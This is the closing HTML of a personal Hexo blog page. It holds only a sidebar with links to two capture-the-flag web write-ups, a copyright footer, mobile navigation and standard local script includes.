            <a href="/2025/09/02/TFCCTF2025/">TFCCTF2025 web</a>
          </li>
        
          <li>
            <a href="/2025/08/10/justCTF2025/">justCTF2025 web</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2025 xrivendell7<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>